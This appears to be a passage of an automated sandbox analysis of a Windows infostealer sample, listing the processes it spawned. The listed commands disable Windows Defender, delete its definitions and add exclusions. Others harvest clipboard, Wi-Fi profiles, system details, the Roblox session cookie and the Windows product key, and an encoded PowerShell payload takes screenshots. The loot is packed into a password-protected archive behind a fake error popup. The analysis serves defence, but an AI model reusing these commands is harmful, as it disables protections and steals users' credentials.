              Source: C:\Users\user\Desktop\El9HaBFrFM.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"Jump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"Jump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"Jump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"Jump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"Jump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSendJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSendJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSendJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSendJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSendJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSendJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -AllJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeProcess created: C:\Users\user\Desktop\El9HaBFrFM.exe "C:\Users\user\Desktop\El9HaBFrFM.exe"Jump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"Jump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"Jump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"Jump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"Jump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"Jump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"Jump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "systeminfo"Jump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "getmac"Jump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"Jump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"Jump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI75162\rar.exe a -r -hp"dave123" "C:\Users\user\AppData\Local\Temp\BfsYI.zip" *"Jump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic os get Caption"Jump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('couldn\x22t run, poor connection try again later.', 0, 'Connection Fail', 0+16);close()""Jump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"Jump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"Jump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"Jump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\El9HaBFrFM.exe'Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSendJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -AllJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\bound.exe'Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\bound.exe bound.exeJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mshta.exe mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('couldn\x22t run, poor connection try again later.', 0, 'Connection Fail', 0+16);close()"Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'
              Source: C:\Users\user\AppData\Local\Temp\bound.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://www.trksyln.net/tgmacro/download
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profile
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\systeminfo.exe systeminfo
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\4mvljvuo\4mvljvuo.cmdline"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\getmac.exe getmac
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESD934.tmp" "c:\Users\user\AppData\Local\Temp\4mvljvuo\CSC4C1DA82D2D044571BEF9081AA72717.TMP"
